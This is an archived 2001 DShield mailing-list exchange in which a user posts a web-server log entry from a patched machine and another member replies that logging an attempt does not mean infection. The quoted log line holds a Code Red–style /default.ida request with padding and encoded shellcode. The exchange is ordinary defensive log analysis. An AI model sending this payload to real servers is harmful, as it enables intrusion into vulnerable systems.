[Dshield] I've got it....

John Groseclose iain at caradoc.org
Sun Aug 5 16:48:22 GMT 2001


At 10:04 AM -0400 8/5/01, Paul Marsh wrote:
>I was checking my logs this morning and found the following....urg2001-08-04
>18:11:53 209.61.190.91 - GET /default.ida
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
>90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
>9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 165 3818 63
>80 - -
>
>This is a log froma patched machine, the machine has been patched for weeks
>now????  Does anyone want or need more info?  I'd like to send these things
>to someone for analysis to find out why the patch did not stop ver.2?

Is this a log from a webserver *on* the patched machine? If so, 
you're not infected - you're just logging the attempt to connect.

Is 209.61.190.91 your machine? Or someone else's?
-- 
John Groseclose
iain at caradoc.org




More information about the list mailing list